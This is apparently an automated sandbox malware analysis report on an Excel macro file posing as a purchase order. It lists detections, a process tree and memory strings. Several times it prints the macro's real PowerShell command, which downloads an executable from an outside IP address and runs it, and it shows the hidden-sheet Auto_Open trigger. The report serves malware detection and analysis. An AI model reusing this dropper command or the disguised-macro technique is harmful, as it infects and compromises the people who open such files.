Loading ...

Play interactive tourEdit tour

Windows Analysis Report purchase Order.xlsm

Overview

General Information

Sample Name:purchase Order.xlsm
Analysis ID:510341
MD5:d1ad5761044b2abb12b78700f1a3a537
SHA1:7fed2064ae3681227f674608df64ff1d7c45a2ee
SHA256:8024e6dc8c230782b570a234318ba7b5a72f64ad5a1a3ff81584e080d9338eba
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Excel documents contains an embedded macro which executes code when the document is opened
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
Searches for user specific document files
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1708 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • powershell.exe (PID: 1444 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • explorer.exe (PID: 2712 cmdline: 'C:\Windows\explorer.exe' C:\Users\Public\eVJOpc.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 2416 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 1444PowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
    • 0x2be5ca:$sa2: -encodedCommand
    • 0x2beb87:$sa2: -EncodedCommand
    • 0x2bf2d2:$sa2: -EncodedCommand
    • 0x2bf369:$sa2: -encodedCommand
    • 0x286e3:$sc1: -nop
    • 0x288eb:$sc1: -nop
    • 0x2be982:$sc2: -NoProfile
    • 0x2be9b1:$sd2: -NonInteractive

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, ProcessId: 1444
    Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
    Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, ProcessId: 1444
    Sigma detected: Non Interactive PowerShellShow sources
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, ProcessId: 1444

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: purchase Order.xlsmAvira: detected
    Multi AV Scanner detection for submitted fileShow sources
    Source: purchase Order.xlsmVirustotal: Detection: 22%Perma Link
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: Binary string: System.Management.Automation.pdbBBKX source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: powershell.exe, 00000002.00000002.430234391.000000000373D000.00000004.00000001.sdmpString found in binary or memory: http://212.192.2
    Source: powershell.exe, 00000002.00000002.430234391.000000000373D000.00000004.00000001.sdmpString found in binary or memory: http://212.192.241.75/sam/new3.e
    Source: powershell.exe, 00000002.00000002.426079549.0000000002D91000.00000004.00000001.sdmpString found in binary or memory: http://212.192.241.75/sam/new3.exe
    Source: powershell.exe, 00000002.00000002.425171182.0000000000220000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.425250143.0000000000444000.00000004.00000040.sdmp, powershell.exe, 00000002.00000002.425295083.0000000001BA6000.00000004.00000001.sdmpString found in binary or memory: http://212.192.241.75/sam/new3.exe-OutFile$env:public
    Source: powershell.exe, 00000002.00000002.425171182.0000000000220000.00000004.00000020.sdmpString found in binary or memory: http://212.192.241.75/sam/new3.exe1.0a.
    Source: powershell.exe, 00000002.00000002.430234391.000000000373D000.00000004.00000001.sdmpString found in binary or memory: http://212.192.241.75/sam/new3.exePE
    Source: powershell.exe, 00000002.00000002.425171182.0000000000220000.00000004.00000020.sdmpString found in binary or memory: http://212.192.241.75/sam/new3.exeu
    Source: explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
    Source: explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
    Source: explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: powershell.exe, 00000002.00000002.425523815.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000002.428542595.0000000001CE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.676730998.0000000001E30000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: powershell.exe, 00000002.00000002.425523815.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000004.00000002.428542595.0000000001CE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.676730998.0000000001E30000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: explorer.exe, 00000005.00000002.677616908.0000000003977000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B987DBE.pngJump to behavior

    System Summary:

    barindex
    Source: Process Memory Space: powershell.exe PID: 1444, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr codeName="ThisWorkbook"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Administrator\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><workbookProtection workbookAlgorithmName="SHA-512" workbookHashValue="g6J+U4jdDrb3WMKx8jWXEvB5PUnevNCnWu18PHNvGg3ndF21lKTVsvDW13wLgH7HS9vnHDRqP928qns3kCbkxA==" workbookSaltValue="p3a4TEPalWYAjtkycguiHw==" workbookSpinCount="100000" lockStructure="1"/><bookViews><workbookView xWindow="390" yWindow="390" windowWidth="21600" windowHeight="11385" firstSheet="1" activeTab="1"/></bookViews><sheets><sheet name="i0o86z" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet1" sheetId="1" r:id="rId2"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">i0o86z!$E$6</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
    Source: purchase Order.xlsmVirustotal: Detection: 22%
    Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................=.....#.........j...............=.....................`I.........v.....................K......................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................'k......................3.............}..v....0.......0.^..............Jy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................'k.....My...............3.............}..v............0.^.............................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................'k......................3.............}..v....0.......0.^..............Jy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................'k.....My...............3.............}..v............0.^.............................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................'k......................3.............}..v....0.......0.^..............Jy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......s.l.3.,. .T.l.s."...".............3.............}..v............0.^.............XJy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................'k......................3.............}..v............0.^..............Jy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.3.............}..v............0.^.............XJy.....".......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................'k......................3.............}..v....H.......0.^..............Jy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................'k.....My...............3.............}..v............0.^.............................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................'k......................3.............}..v....H.......0.^..............Jy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................'k.....My...............3.............}..v..... ......0.^.............................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................'k..... ................3.............}..v....H!......0.^..............Jy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................'k.....My...............3.............}..v.....&......0.^.....................f.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................'k....8'................3.............}..v.....'......0.^..............Jy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k.....My...............3.............}..v....`.......0.^.............................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k......................3.............}..v...../......0.^..............Jy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k.....My...............3.............}..v.....4......0.^.....................r.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k.....5................3.............}..v.... 6......0.^..............Jy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .........'k.....My...............3.............}..v.....9......0.^.............XJy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k....h:................3.............}..v.....:......0.^..............Jy.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................0.'k......y...............3.............}..v............0.^.............................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k....H.................3.............}..v............0.^.............(.y.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................0.'k......y...............3.............}..v............0.^.............................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k....H.................3.............}..v............0.^.............(.y.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................0.'k......y...............3.............}..v....0.......0.^.....................~.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k......................3.............}..v....h.......0.^.............(.y.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.8.3.............}..v....x.......0.^...............y.....".......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k....0.................3.............}..v............0.^.............(.y.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................0.'k......y...............3.............}..v....x.......0.^.............................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k....0.................3.............}..v............0.^.............(.y.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................0.'k......y...............3.............}..v....x.......0.^.............................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k......................3.............}..v............0.^.............(.y.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................0.'k......y...............3.............}..v............0.^.....................f.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k......................3.............}..v.... .......0.^.............(.y.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................0.'k......y...............3.............}..v............0.^.............................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k......................3.............}..v.... .......0.^.............(.y.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....P"......0.^...............y.....4.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k.....#................3.............}..v.....#......0.^.............(.y.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................0.'k......y...............3.............}..v.....(......0.^.....................l.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................'k.....)................3.............}..v.....*......0.^.............(.y.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'....... .......0.'k......y...............3.............}..v.....-......0.^...............y.............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.................'k....H.................3.............}..v............0.^.............(.y.............................Jump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' C:\Users\Public\eVJOpc.exe
    Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' C:\Users\Public\eVJOpc.exeJump to behavior
    Source: purchase Order.xlsmJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
    Source: explorer.exe, 00000005.00000002.677428741.0000000003790000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$purchase Order.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREE06.tmpJump to behavior
    Source: classification engineClassification label: mal64.expl.winXLSM@6/7@0/0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Windows\system32\MsftEdit.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
    Source: purchase Order.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: AE430000.0.drInitial sample: OLE zip file path = xl/media/image1.png
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: Binary string: System.Management.Automation.pdbBBKX source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.425971245.0000000002B77000.00000004.00000040.sdmp
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
